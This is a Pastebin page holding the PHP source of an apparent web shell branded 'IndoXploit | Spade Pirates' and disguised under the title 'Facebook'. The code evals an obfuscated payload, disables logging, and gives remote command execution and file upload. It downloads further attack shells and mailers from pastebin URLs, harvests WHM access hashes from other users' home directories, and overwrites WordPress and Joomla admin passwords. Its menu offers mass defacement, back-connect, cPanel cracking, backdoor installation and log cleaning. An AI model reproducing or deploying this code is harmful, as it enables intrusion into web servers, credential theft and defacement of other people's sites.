Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- @session_start();
- @error_reporting(0);
- @error_log(false);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('output_buffering',0);
- @ini_set('display_errors', 0);
- @set_time_limit(0);
- @set_magic_quotes_runtime(0);
- if( @preg_match("/(Google|robot|bot|bing|yahoo|facebook|visionutils)/Ui",$_SERVER['HTTP_USER_AGENT'])) {
- die('HTTP/1.1 404 Not Found');
- exit;}
- if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
- @ob_clean();
- $file = $_GET['file'];
- header('Content-Description: File Transfer');
- header('Content-Type: application/octet-stream');
- header('Content-Disposition: attachment; filename="'.basename($file).'"');
- header('Expires: 0');
- header('Cache-Control: must-revalidate');
- header('Pragma: public');
- header('Content-Length: ' . filesize($file));
- readfile($file);
- exit;}?>
- <?php eval(gzinflate(base64_decode(file_get_contents(str_rot13(gzinflate(str_rot13(base64_decode(('K1pCQrbS10LOWFgvyi9Y1CtVqtJCzcvSzyxYrggqWfEFAA=='))))))))); ?>
- <head>
- <title>Facebook</title>
- <link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yl/r/H3nktOa7ZMg.ico" />
- <meta name='author' content='IndoXploit | Spade Pirates'>
- <meta name="ROBOTS" content="NOINDEX, NOFOLLOW, NOARCHIVE" />
- <meta name="GOOGLEBOT" content="NOINDEX, NOFOLLOW, NOARCHIVE" />
- <meta charset="UTF-8">
- <style type='text/css'>
- @import url(https://fonts.googleapis.com/css?family=Abel);
- @import url(http://fonts.googleapis.com/css?family=Iceberg);
- *, body, html{cursor: url(http://cur.cursors-4u.net/cursors/cur-9/cur863.ani), url(http://cur.cursors-4u.net/cursors/cur-9/cur863.png), default !important;}
- html {background: #111111;color: #ffffff;font-family: 'Iceberg';font-size: 13px;width: 100%;}
- li {display: inline;margin: 5px;padding: 5px;}
- table, th, td {border-collapse:collapse;font-family: Tahoma, Geneva, sans-serif;background: transparent;font-family: 'Iceberg';font-size: 13px;}
- .table_home, .th_home, .td_home {border: 1px solid #ffffff;}
- .table_home tr:hover {background-color: green;}
- .th_home tr:hover{background-color: #1a1a1a;}
- .wenk{color: lime;}
- th {padding: 10px;}
- a {color: #ffffff;text-decoration: none;}
- a:hover {color: gold;text-decoration: underline;text-shadow: 0pt 0pt 0.9em lime, 0pt 0pt 0.9em lime;color: #00ff00;text-decoration: none;}
- #tangina:hover{ background-color: #1a1a1a; }
- b {color: gold;}
- input[type=text], input[type=password],input[type=submit] {background: transparent;color: #ffffff;border: 1px solid #ffffff;margin: 5px auto;padding-left: 5px;
- font-family: 'Abel';font-size: 13px;}
- textarea {border: 1px solid #ffffff;width: 45%;height: 400px;padding-left: 5px;margin: 10px auto;resize: none;background: transparent;color: #ffffff;font-family: 'Abel';font-size: 13px;}
- select {background: transparent;color: #ffffff;border: 1px solid #ffffff;margin: 5px auto;padding-left: 5px;font-family: 'Abel';font-size: 13px;}
- .but {background: transparent;color: #ffffff;border: 1px solid #ffffff;margin: 5px auto;padding-left: 5px;font-family: 'Abel';font-size: 13px;}
- li a:hover{text-shadow: 0pt 0pt 0.99em lime, 0pt 0pt 0.99em lime;color: #00ff00;text-decoration: none;}
- .th_home, .titulo {text-shadow: 0pt 0pt 0.99em lime, 0pt 0pt 0.99em lime;color: #00ff00;text-decoration: none;}
- .board {text-align: center;border: 1px solid rgba(255,180,0,0.4);border-radius: 4px;width: 500px;}
- .board p {font-size: 65px;font-family: 'Monoton', cursive;color: #fff;text-transform: uppercase;padding: 0;margin: 0;}
- </style>
- <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
- <script type="text/javascript" src="https://raw.githubusercontent.com/chuckyglitch/novacancy.js/master/javascript/jquery.novacancy.min.js"></script>
- <link href='http://fonts.googleapis.com/css?family=Monoton' rel='stylesheet' type='text/css'>
- <script type="text/javascript">
- $(document).ready(function() {$('#spade').novacancy({'reblinkProbability': 0.1,'blinkMin': 0.2,'blinkMax': 0.6,'loopMin': 8,'loopMax': 10,'color': '#ffffff','glow': ['0 0 80px #ffffff', '0 0 30px #008000', '0 0 6px #0000ff']});
- $('#pirates').novacancy({'blink': 1,'off': 1,'color': 'Red','glow': ['0 0 80px Red', '0 0 30px FireBrick', '0 0 6px DarkRed']});});
- function g(a,c,p1,p2,p3,charset) {set(a,c,p1,p2,p3,charset);document.mf.submit();}
- </script>
- </head>
- <?php
- if (file_exists("php.ini")){
- }else{
- $img = fopen('php.ini', 'w');
- $sec = "safe_mode = OFF
- disable_funtions = NONE";
- fwrite($img ,$sec);
- fclose($img);}
- function w($dir,$perm) {
- if(!is_writable($dir)) {
- return "<font color=red>".$perm."</font>";
- } else {
- return "<font color=lime>".$perm."</font>";
- }
- }
- function UrlLoop($url,$type){
- $urlArray = array();
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- $result = curl_exec($ch);
- $regex='|<a.*?href="(.*?)"|';
- preg_match_all($regex,$result,$parts);
- $links=$parts[1];
- foreach($links as $link){
- array_push($urlArray, $link);
- }
- curl_close($ch);
- foreach($urlArray as $value){
- $lol="$url$value";
- if(preg_match("#$type#is", $lol)) {
- echo "$lol\r\n";
- }
- }
- }
- if(!function_exists('b'.'as'.'e6'.'4_'.'en'.'co'.'de')){function __ZW5jb2Rlcg($data){if(empty($data))return;
- $b64='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
- $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;
- $ac = 0;
- $enc = '';
- $tmp_arr = array();
- if(!$data){return $data;
- }do{$o1 = charCodeAt($data, $i++);
- $o2 = charCodeAt($data, $i++);
- $o3 = charCodeAt($data, $i++);
- $bits = $o1 << 16 | $o2 << 8 | $o3;
- $h1 = $bits >> 18 & 0x3f;
- $h2 = $bits >> 12 & 0x3f;
- $h3 = $bits >> 6 & 0x3f;
- $h4 = $bits & 0x3f;
- $tmp_arr[$ac++] = charAt($b64, $h1).charAt($b64, $h2).charAt($b64, $h3).charAt($b64, $h4);
- } while ($i < strlen($data));
- $enc = implode($tmp_arr, '');
- $r = (strlen($data) % 3);
- return ($r ? substr($enc, 0, ($r - 3)) : $enc).substr('===', ($r || 3));
- }function charCodeAt($data, $char){ return ord(substr($data, $char, 1));
- }function charAt($data, $char){return substr($data, $char, 1);
- }}else{function __ZW5jb2Rlcg($s){$b='b'.'as'.'e6'.'4_'.'en'.'co'.'de';
- return $b($s);
- }}if(!function_exists('b'.'a'.'se'.'6'.'4_'.'d'.'ec'.'ode')){function __ZGVjb2Rlcg($input){if(empty($input))return;
- $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
- $chr1 = $chr2 = $chr3 = "";
- $enc1 = $enc2 = $enc3 = $enc4 = "";
- $i = 0;
- $output = "";
- $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);
- do{$enc1 = strpos($keyStr, substr($input, $i++, 1));
- $enc2 = strpos($keyStr, substr($input, $i++, 1));
- $enc3 = strpos($keyStr, substr($input, $i++, 1));
- $enc4 = strpos($keyStr, substr($input, $i++, 1));
- $chr1 = ($enc1 << 2) | ($enc2 >> 4);
- $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);
- $chr3 = (($enc3 & 3) << 6) | $enc4;
- $output = $output . chr((int) $chr1);
- if ($enc3 != 64) {$output = $output . chr((int) $chr2);
- }if ($enc4 != 64) {$output = $output . chr((int) $chr3);
- }$chr1 = $chr2 = $chr3 = "";
- $enc1 = $enc2 = $enc3 = $enc4 = "";
- }while($i < strlen($input));
- return $output;
- }}else{function __ZGVjb2Rlcg($s){$b='b'.'as'.'e6'.'4_'.'de'.'co'.'de';
- return $b($s);
- }}
- function exe($cmd) {
- if(function_exists('system')) {
- @ob_start();
- @system($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- } elseif(function_exists('exec')) {
- @exec($cmd,$results);
- $buff = "";
- foreach($results as $result) {
- $buff .= $result;
- } return $buff;
- } elseif(function_exists('passthru')) {
- @ob_start();
- @passthru($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- } elseif(function_exists('shell_exec')) {
- $buff = @shell_exec($cmd);
- return $buff;
- }
- }
- function perms($file){
- $perms = fileperms($file);
- if (($perms & 0xC000) == 0xC000) {
- $info = 's';
- } elseif (($perms & 0xA000) == 0xA000) {
- $info = 'l';
- } elseif (($perms & 0x8000) == 0x8000) {
- $info = '-';
- } elseif (($perms & 0x6000) == 0x6000) {
- $info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) {
- $info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) {
- $info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) {
- $info = 'p';
- } else {
- $info = 'u';
- }
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
- function hdd($s) {
- if($s >= 1073741824)
- return sprintf('%1.2f',$s / 1073741824 ).' GB';
- elseif($s >= 1048576)
- return sprintf('%1.2f',$s / 1048576 ) .' MB';
- elseif($s >= 1024)
- return sprintf('%1.2f',$s / 1024 ) .' KB';
- else
- return $s .' B';
- }
- function ambilKata($param, $kata1, $kata2){
- if(strpos($param, $kata1) === FALSE) return FALSE;
- if(strpos($param, $kata2) === FALSE) return FALSE;
- $start = strpos($param, $kata1) + strlen($kata1);
- $end = strpos($param, $kata2, $start);
- $return = substr($param, $start, $end - $start);
- return $return;
- }
- if(get_magic_quotes_gpc()) {
- function idx_ss($array) {
- return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
- }
- $_POST = idx_ss($_POST);
- }
- function CreateTools($names,$lokasi){
- if ( $_GET['create'] == $names ){
- $a= "".$_SERVER['SERVER_NAME']."";
- $b= dirname($_SERVER['PHP_SELF']);
- $c = "/spade_tools/".$names.".php";
- if (file_exists('spade_tools/'.$names.'.php')){
- echo '<script type="text/javascript">alert("Done");window.location.href = "spade_tools/'.$names.'.php";</script> ';
- }
- else {mkdir("spade_tools", 0777);
- file_put_contents('spade_tools/'.$names.'.php', file_get_contents($lokasi));
- echo ' <script type="text/javascript">alert("Done");window.location.href = "spade_tools/'.$names.'.php";</script> ';}}}
- CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
- CreateTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
- CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
- CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
- CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
- CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
- CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
- CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
- CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
- CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
- CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
- CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
- CreateTools("extractor","http://pastebin.com/raw/jQnMFHBL");
- CreateTools("bh","http://pastebin.com/raw/3L2ESWeu");
- CreateTools("dhanus","http://pastebin.com/raw/v4xGus6X");
- CreateTools("bypasssym","http://pastebin.com/raw/8ZxGbJXB");
- if(isset($_GET['dir'])) {
- $dir = $_GET['dir'];
- chdir($_GET['dir']);
- } else {
- $dir = getcwd();
- }
- $dir = str_replace("\\","/",$dir);
- $scdir = explode("/", $dir);
- $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
- $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
- $ds = @ini_get("disable_functions");
- $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
- $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
- $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
- $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
- $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
- $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
- if(!function_exists('posix_getegid')) {
- $user = @get_current_user();
- $uid = @getmyuid();
- $gid = @getmygid();
- $group = "?";
- } else {
- $uid = @posix_getpwuid(posix_geteuid());
- $gid = @posix_getgrgid(posix_getegid());
- $user = $uid['name'];
- $uid = $uid['uid'];
- $group = $gid['name'];
- $gid = $gid['gid'];
- }
- $d0mains = @file("/etc/named.conf");
- $users=@file('/etc/passwd');
- if($d0mains)
- {
- $count;
- foreach($d0mains as $d0main)
- {
- if(@ereg("zone",$d0main))
- {
- preg_match_all('#zone "(.*)"#', $d0main, $domains);
- flush();
- if(strlen(trim($domains[1][0])) > 2)
- {
- flush();
- $count++;
- }
- }
- }
- }
- function pempem(){
- $OSs = exe("uname -s");
- $meme = exe("uname -r");
- return $OSs. "+" .$meme;
- }
- $sport=$_SERVER['SERVER_PORT'];
- echo '<div class="board" style="float: left; width: 25%;"><p id="spade">Spade</p><p id="pirates">Pirates</p></div>';
- echo "<table style='width:65% float: left; margin-left: 26%;' >";
- echo "<tr><td>System: <font color=lime>".php_uname()."</font> [<a href='https://www.google.com/?q=".pempem()."+Kernel+Exploit' target='_blank'>Google</a>] [<a href='https://www.kernel-exploits.com/kernel/?version=".exe("uname -r")."' target='_blank'>Kernel Exploit</a>]</td></tr>";
- echo "<tr><td>User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")</td></tr>";
- echo "<tr><td>Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
- echo "<tr><td>HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font></td></tr>";
- echo "<tr><td>Websites :<font color=lime> $count </font> Domains</td></tr>";
- echo "<tr><td>Port :<font color=lime> $sport</font> </td></tr>";
- echo "<tr><td>Safe Mode: $sm</td></tr>";
- echo "<tr><td>Disable Functions: $show_ds</td></tr>";
- echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
- echo "<tr><td>Current DIR: ";
- foreach($scdir as $c_dir => $cdir) {
- echo "<a href='?dir=";
- for($i = 0; $i <= $c_dir; $i++) {
- echo $scdir[$i];
- if($i != $c_dir) {
- echo "/";
- }
- }
- echo "'>$cdir</a>/ ";
- }
- echo "[ <a class='wenk' href='".$_SERVER['PHP_SELF']."'>Home</a> ]";
- echo "<tr><td><form method='post' action='?dir=$dir&do=cmd'>
- spade@localhost:~$
- <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
- </form></td>";
- echo "<td><form method='post' action='?dir=$dir&do=mkfile'>
- Make File :
- <input type='text' size='30' height='10' name='mkfile'><input type='submit' name='makefile' value='>>'>
- </form></td></tr>";
- echo "</table><hr>";
- echo "<center>";
- echo "<ul>";
- echo "<li>[ <a href='" . $_SERVER["PHP_SELF"] . "'>Home</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=symconfig'>Config 2</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=dbsql'>SQL Shell</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=backconnect'>Weevely Back Connect</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=whm'>WHM Cracker</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=symlink2'>Symlink 2</a> ]<br></li>";
- /*First Layer*/
- echo "<li>[ <a href='?dir=$dir&do=network'>Back Connect</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=bypasser'>Bypasser</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=krdp2'>K-RDP2 Shell</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=vhost'>Bypass Vhost</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=wp-reset'>WP Reset</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=jm-reset'>JML Reset</a> ]</li><br>";
- /*Second Layer*/
- echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=auto_cu_wp'>WordPress Auto Edit User V.2</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=auto_cu_joomla'>Joomla Auto Edit User V.2</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=endec'>Script Encode/Decode</a> ]<br></li>";
- /*Third Layer*/
- echo "<li>[ <a href='?dir=$dir&do=loghunter'>Log Hunter</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=revs'>Revslider Config Grabber Exploit</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=whois'>WhoIs</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=dbdump'>Database Dump</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=vb'>VB Index Changer</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=shellchk'>Shell Checker</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=shelscan'>Shell Finder</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=zip'>Zip Menu</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=python'>Python CMD</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=magen'>Magento DB Info</a> ]</li><br>";
- /*Fourth Layer*/
- echo "<li>[ <a href='?dir=$dir&do=cloudflare'>CloudFlare</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=port-scan'>Port Scan</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=hashid'>Hash ID</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=backdoor'>Install a Backdoor</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=hash'>Hash Encoder</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=mail'>Mailer</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=clear_logs'>Log Cleaner</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=about'>About</a> ]</li>";
- echo "<li>[ <a href='?dir=$dir&do=kill'>Kill Me</a> ]</li>";
- echo "</ul>";
- echo "</center>";
- echo "<hr>";
- if($_GET['do'] == 'upload') {
- echo "<center><h1 class='titulo'>UPLOAD</h1><br>";
- if($_POST['upload']) {
- if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
- $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
- } else {
- $act = "<font color=red>failed to upload file</font>";
- }
- }
- echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
- echo $act;
- echo "</center>";
- }
- elseif($_GET['do'] == 'cmd') {
- echo "<center><h1 class='titulo'>CMD SHELL</h1></center><br><form method='post' action='?dir=$dir&do=cmd'>
- spade@localhost:~$
- <input type='text' size='30' style='border: none;' height='10' name='do_cmd'>
- </form><br>";
- if($_POST['do_cmd']) {
- echo "<pre>".exe($_POST['do_cmd'])."</pre>";
- }
- }elseif($_GET['do'] == 'mkfile'){
- echo "<center><h1 class='titulo'>MAKE FILE</h1></center>";
- if(isset($_POST['mkfile']) && !empty($_POST['mkfile'])){
- $feli = htmlspecialchars($_POST['mkfile']);
- $penk = fopen($feli, "a+");
- if($penk) {
- $tact = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['mkfile']."';</script>";
- } else {
- $tact = "<center><font color=red>permission denied</font></center>";
- }
- echo $tact;
- }
- }elseif($_GET['do'] == 'whm'){
- function pekpek($text, $something, $wenk, $i = 1){
- $ar0 = explode($something, $text);
- $ar1 = explode($wenk, $ar0[$i]);
- return trim($ar1[0]);
- }
- echo "<center><h1 class=titulo>Auto WHM Cracker</h1><br>";
- $d0mains = @file("/etc/named.conf");
- $domains = scandir("/var/named");
- if($domains or $d0mains){
- $domains = scandir("/var/named");
- if($domains){
- echo "<table><tr><th>Count</th><th>Domain</th><th>User</th><th> | </th><th>Access Hash</th></tr>";
- $count = 1;
- $dc = 0;
- $list = scandir("/var/named");
- foreach($list as $domain){
- if(strpos($domain, ".db")){
- $domain = str_replace(".db", "", $domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- $dirz = "/home".$owner['name']."/.accesshash";
- $path = getcwd();
- if(is_readable($dirz)){
- copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
- $fvck = file_get_contents(''.$path.'/'.$owner['name'].'.txt');
- $pword = pekpek($fvck, 'password="','"');
- echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2086 target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$pword."</td><td><a href='".$owner['name'].".txt' target='_blank' >Click Me!</a></td></tr>";
- $dc++;
- }
- }
- }
- echo "</table>";
- $total = $dc;
- echo "<br><font color=lime>TOTAL WHM FOUND :: </font><font color=yellow>".$total."</font>";
- }else{
- $d0mains = @file("/etc/named.conf");
- if($d0mains){
- echo "<table><tr><th>Count</th><th>Domain</th><th>User</th><th> | </th><th>Access Hash</th></tr>";
- $count = 1;
- $dc = 0;
- $menk = array();
- foreach($d0mains as $d0main){
- if(@eregi('zone', $d0main)){
- preg_match_all('#zone "(.*)"#', $d0main, $domain);
- flush();
- if(strlen(trim($domain[1][0])) > 2){
- $menk = $domain[1][0];
- }
- }
- }
- $menk = array_unique($menk);
- $user = array();
- $damn = array();
- foreach($menk as $penk){
- $infos = @posix_getpwuid(fileowner("/etc/valiases/", $penk));
- $user[] = $infos['name'];
- $damn[] = $penk;
- }
- array_multisort($user, $damn);
- $datas = file("/etc/passwd");
- $passwd = array();
- foreach($datas as $satad){
- $roar = explode(':', $satad);
- if(strpos($roar[5], 'home')){
- $passwd[$roar[0]] = $roar[5];
- }
- }
- $lelz = 0;
- $jogabelz = 1;
- foreach($user as $resu){
- $dirz = '/home/'.$resu.'/.accesshash';
- $path = getcwd();
- if(is_readable($dirz)){
- copy($dirz, ''.$path.'/'.$resu.'.txt');
- $puke = file_get_contents(''.$path.'/'.$resu.'.txt');
- $pass = pekpek($puke, 'password="', '"');
- echo "<tr><td>".$count++."</td><td><a href='http://".$damn[$jogabelz - 1]."/' target='_blank'>".$damn[$jogabelz - 1]."</a></td><td>".$resu."</td><td>".$pass."</td><td><a href='".$resu.".txt' target='_blank' >Click Me!</a></td></tr>";
- $dc++;
- flush();
- $lelz = $lelz ? 0 : 1;
- $jogabelz++;
- }
- }
- }
- echo "</table>";
- $total = $dc;
- echo "<br><font color=lime>TOTAL WHM FOUND :: </font><font color=yellow>".$total."</font>";
- }
- }else{
- echo "<font color=red>ERROR /var/named or /etc/named.conf NOT ACCESSIBLE!</font>";
- }
- echo "</center>";
- }elseif ($_GET['do'] == 'wp-reset') {
- echo "<center/><br/><form action='' method='post'><h1 class='titulo'>WORDPRESS RESET PASSWORD</h1><br>";
- if (empty($_POST['pwd'])) {
- $puta = "\$P\$BMDbmkm1fUU4U6fm/DFqEnxrUuNrki/";
- echo "<FORM method='POST'>
- <table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr>
- <tr><td>Hostname: <input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr>
- <tr><td>Database: <input style='width:270px;' class='inputz' type='text' name='database' value='wp-' /></td></tr>
- <tr><td>DB Username: <input style='width:270px;' class='inputz' type='text' name='username' value='wp-' /></td></tr>
- <tr><td>DB Password: <input style='width:270px;' class='inputz' type='text' name='password' value='***' /></td></tr>
- <tr><td>Username: <input style='width:270px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
- <tr><td>Password: <input style='width:270px;' class='inputz' type='text' name='pwd' value='".FILTER_VAR(htmlspecialchars($puta), FILTER_SANITIZE_STRING)."' /></td><tr><td>
- <input style='width:220px;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
- </td></tr> </table><br>";
- } else {
- $localhost = $_POST['localhost'];
- $database = $_POST['database'];
- $username = $_POST['username'];
- $password = $_POST['password'];
- $pwd = $_POST['pwd'];
- $admin = $_POST['admin'];
- @mysql_connect($localhost, $username, $password) or die(mysql_error());
- @mysql_select_db($database) or die(mysql_error());
- //$hash = crypt($pwd);
- $a4s = @mysql_query("UPDATE wp_users SET user_login ='" . $admin . "' WHERE ID = 1") or die(mysql_error());
- $a4s = @mysql_query("UPDATE wp_users SET user_pass ='" . $pwd . "' WHERE ID = 1") or die(mysql_error());
- $a4s = @mysql_query("UPDATE wp_users SET user_login ='" . $admin . "' WHERE ID = 2") or die(mysql_error());
- $a4s = @mysql_query("UPDATE wp_users SET user_pass ='" . $pwd . "' WHERE ID = 2") or die(mysql_error());
- $a4s = @mysql_query("UPDATE wp_users SET user_login ='" . $admin . "' WHERE ID = 3") or die(mysql_error());
- $a4s = @mysql_query("UPDATE wp_users SET user_pass ='" . $pwd . "' WHERE ID = 3") or die(mysql_error());
- $a4s = @mysql_query("UPDATE wp_users SET user_email ='" . $SQL . "' WHERE ID = 1") or die(mysql_error());
- if ($a4s) {
- echo "<b class='wenk'> Success!! Now You Can Login To wp-admin</b> ";
- }else{ echo "<font color='red'>An Error Occures While Reseting Password!</font>";}
- }
- echo "
- </div></center>";
- } elseif ($_GET['do'] == 'jm-reset') {
- echo "<center/><br/><form action='' method='post'><h1 class='titulo'>JOOMLA RESET PASSWORD</h1><br>";
- if (empty($_POST['pwd'])) {
- echo "<FORM method='POST'><table class='tabnet' style='width:300px;'><tr><th colspan='2'>Connect to MySQL </th></tr>
- <tr><td>Host: <input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr>
- <tr><td>Database: <input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr>
- <tr><td>DB Password: <input style='width:270px;' class='inputz' type='password' name='password' value='***' /></td></tr>
- <tr><td>Username: <input style='width:270px;' class='inputz' name='aadmin' value='admin' /></td></tr>
- <tr><td>Password: <input style='width:270px;' class='inputz' name='pawd' value='e10adc3949ba59abbe56e057f20f883e' /></td><tr><td>
- <input style='width:270px;' class='inputz' type='submit' value='change!' name='send' /></FORM>
- </td></tr> </table><br>";
- } else {
- $localhost = $_POST['localhost'];
- $database = $_POST['database'];
- $username = $_POST['username'];
- $password = $_POST['password'];
- $pwd = $_POST['pawd'];
- $admin = $_POST['aadmin'];
- @mysql_connect($localhost, $username, $password) or die(mysql_error());
- @mysql_select_db($database) or die(mysql_error());
- $hash = crypt($pwd);
- $SQL = @mysql_query("UPDATE jos_users SET username ='" . $admin . "' WHERE ID = 62") or die(mysql_error());
- $SQL = @mysql_query("UPDATE jos_users SET password ='" . $pwd . "' WHERE ID = 62") or die(mysql_error());
- $SQL = @mysql_query("UPDATE jos_users SET username ='" . $admin . "' WHERE ID = 63") or die(mysql_error());
- $SQL = @mysql_query("UPDATE jos_users SET password ='" . $pwd . "' WHERE ID = 63") or die(mysql_error());
- $SQL = @mysql_query("UPDATE jos_users SET username ='" . $admin . "' WHERE ID = 64") or die(mysql_error());
